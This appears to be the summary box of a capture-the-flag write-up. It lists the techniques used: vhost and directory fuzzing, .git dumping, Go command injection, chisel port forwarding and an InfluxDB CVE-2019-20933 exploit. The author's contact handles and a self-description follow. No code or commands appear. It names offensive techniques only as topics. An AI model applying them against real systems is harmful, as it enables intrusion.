
Summary of knowledge

  • vhost fuzzing
  • dir fuzzing
  • dump and extract .git dir
  • golang source code command injection
  • chisel port forwarding
  • InfluxDB Exploit CVE-2019-20933 exploit
  • golang source code file reading capabilities

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…